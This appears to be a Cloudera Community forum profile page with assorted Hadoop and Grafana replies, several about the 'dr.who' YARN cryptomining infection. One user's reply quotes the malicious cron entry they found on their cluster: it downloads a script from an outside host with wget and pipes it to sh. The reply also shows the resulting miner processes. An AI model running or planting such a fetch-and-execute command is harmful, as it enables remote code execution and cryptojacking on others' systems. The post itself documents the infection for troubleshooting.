About hadoopNoob

ggangadharan · ‎10-10-2023

Grafana is a popular open-source platform for monitoring and observability, and it is commonly associated with telemetry data visualization, especially when integrated with time-series databases like Prometheus, InfluxDB, or Elasticsearch. However, Grafana is not limited to telemetry data visualization, and it can be used for a wide range of data sources, including HDFS and Hive tables. Here are some options for using Grafana for data visualization beyond telemetry: Hive Data Sources: Grafana has built-in support for various data sources, and it offers plugins for connecting to databases and data lakes. You can configure Grafana to connect to Hive as a data source and visualize data stored in Hive tables. HDFS Data Sources: While Grafana primarily focuses on time-series data, you can still use it to visualize data stored in HDFS by connecting it to Hadoop-related data sources or by exporting HDFS data to another data store (e.g., Elasticsearch, InfluxDB) that Grafana supports. SQL Databases: Grafana can connect to traditional relational databases using SQL data sources. If you have data stored in SQL databases, you can use Grafana to create dashboards and visualizations. Log Data: Grafana can be used for log data analysis and visualization. You can integrate it with tools like Loki (for log aggregation) and explore log data in dashboards. Custom Plugins: If you have a unique data source or a specific format, you can develop custom data source plugins for Grafana to connect to your data and visualize it as needed. API Data: Grafana supports various data sources that expose data through APIs. You can connect to REST APIs, GraphQL APIs, and other web services to visualize data. Mixed Data Sources: Grafana allows you to create dashboards that combine data from multiple sources, making it versatile for various data visualization needs. While Grafana is flexible and can be used for a wide range of data sources, it's important to consider the nature of your data and the specific visualization requirements. Depending on your use case, you may need to choose the most suitable data source, data format, and visualization options within Grafana to achieve your desired results.

vishalaug · ‎03-08-2022

In my case, the below cron entry was found $ sudo -u yarn crontab -l */10 * * * * wget http://vbyphnnymdjnsiau.3utilities.com/Bj2yso0 -O-|sh It resulted in so many spurious processes initiated by yarn - and shooting up the CPU. Nothing could be done. In some cases the number of entries were as high as 20k. $ ps -ef | grep yarn yarn 30321 30318 0 11:44 ? 00:00:00 NHNe5C5iHr yarn 30323 29152 0 11:44 ? 00:00:00 NHNe5C5iHr yarn 30330 29075 0 11:44 ? 00:00:00 rxNqqqOesC1HqN yarn 30427 30319 0 11:44 ? 00:00:00 NHNe5C5iHr yarn 30773 1 0 10:34 ? 00:00:00 fexsOEvOv yarn 31186 1 0 10:34 ? 00:00:00 GqOeeG5eCC1rO yarn 31189 1 0 10:34 ? 00:00:00 ff1NrseqqffTHrve yarn 31727 1 0 09:20 ? 00:00:00 ivxvj1Ei1 yarn 31731 31727 0 09:20 ? 00:00:04 ivxvj1Ei1 yarn 31770 1 0 09:20 ? 00:00:00 GjN1GxCsqE51fs yarn 31771 31770 0 09:20 ? 00:00:21 GjN1GxCsqE51fs yarn 31774 31770 0 09:20 ? 00:00:05 GjN1GxCsqE51fs yarn 31790 1 0 09:20 ? 00:00:00 EvGeHe5OxfC yarn 31791 31790 0 09:20 ? 00:00:23 EvGeHe5OxfC yarn 31793 31790 0 09:20 ? 00:00:02 EvGeHe5OxfC yarn 31803 1 0 09:20 ? 00:00:00 qCevqvvGff1 yarn 31804 31803 0 09:20 ? 00:00:18 qCevqvvGff1 yarn 31806 31803 0 09:20 ? 00:00:04 qCevqvvGff1 yarn 32243 1 0 10:35 ? 00:00:00 TNsNf5fqTEv5esOxx yarn 32254 1 0 10:35 ? 00:00:00 qCevqvvGff1 yarn 32255 1 0 10:35 ? 00:00:00 seffjsOExr Thanks for discussing and bringing up this issue.

sridhar-exelon · ‎06-15-2021

Thank you Vidya

hadoopNoob · ‎04-30-2019

Yes, the issue was with java, re-configuring it solved the issue

TonyStank · ‎02-03-2019

Hello, Loading data directly to Kafka without any Service seems unlikely. However, you can use execute a simple kafka console producer to send all your data to the kafka service. But if your requirement is to save data to HDFS you need to include a few more services along with Kafka. For example, Crawlers >> kafka console producer (or) Spark Streaming >> Flume >> HDFS As your requirement is to store the data in HDFS and not stream the data. I suggest you execute a Spark job, it will store your data to HDFS. Refer mentioned commands to execute a spark job to move data to HDFS. Initiate a spark-shell Execute the mentioned command in the Spark shell in the same order. val moveFile = sc.textFile("file:///path/to/Sample.log") moveFile.saveAsTextFile("hdfs:///tmp/Sample.log")

Harsh J · ‎12-03-2018

This may be a very basic question but I ask because it is unclear from the data you've posted: Have you accounted for replication? 50 GiB of HDFS file lengths summed up (hdfs dfs -du values) with 3x replication would be ~150 GiB of actual used space on the physical storage. The /dfs/dn is where the file block replicas are stored. Nothing unnecessary is retained in HDFS, however a common overlooked item is older snapshots retaining data blocks that are no longer necessary. Deleting such snapshots frees up the occupied space based on HDFS files deleted after the snapshot was made. If you're unable to grow your cluster, but need to store more data, then you may sacrifice availability of data by lowering your default replication to 2x or 1x (via dfs.replication config for new data writes, and hdfs dfs -setrep n for existing data).

buyaoshuohua · ‎10-18-2018

Since I was hit with the mining virus, it would continuously submit the mining procedure to port 8088, so I changed my yarn port to 8089 and solved it

hadoopNoob · ‎10-17-2018

I have posted the answer, in previous reply, can you please be specific? check this post, i replied there. http://community.cloudera.com/t5/Cloudera-Manager-Installation/Yarn-Node-Manager-unexpected-exists-occurring-after/m-p/79048#M14736

hadoopNoob · ‎08-26-2018

Dr.who issue is very common these days , i am not sure whos exploiting opensource project or sth. but the main cause is usually a remote shell script would be attached to your resource manager node which cause dr.who to spawn. you dont need to kerberize just use some linux firewall Thanks

hadoopNoob · ‎08-15-2018

Can you please share logs ? plus share screen of that particular hosts. Thanks

Online	Offline
Last Visited	‎11-25-2022 11:39 AM

Member Since	‎06-24-2018 02:36 PM
Last Visited	‎11-25-2022 11:39 AM
Posts	59
Kudos received	8

Cloudera Community

Re: Spark 2.3 Csd failed to load

Re: Yarn- Node Manager unexpected exists occurring...

Re: Dr who name is converted to different string w...

Re: Host is not in contact with server

Re: data monitoring dashboard from hdfs and hive

Re: HDP 2.6.1 Virus CrytalMiner (dr.who)

Re: Spark -Shell does not start

Re: Spark 2.3 Csd failed to load

Re: Data ingestion using kafka from crawlers

Re: Cleaning /dfs/dn sub-directories to free disk ...

Re: Dr who name is converted to different string w...

Re: Node manager unexpected exits

Re: Yarn- Node Manager unexpected exists occurring...

Re: Host is not in contact with server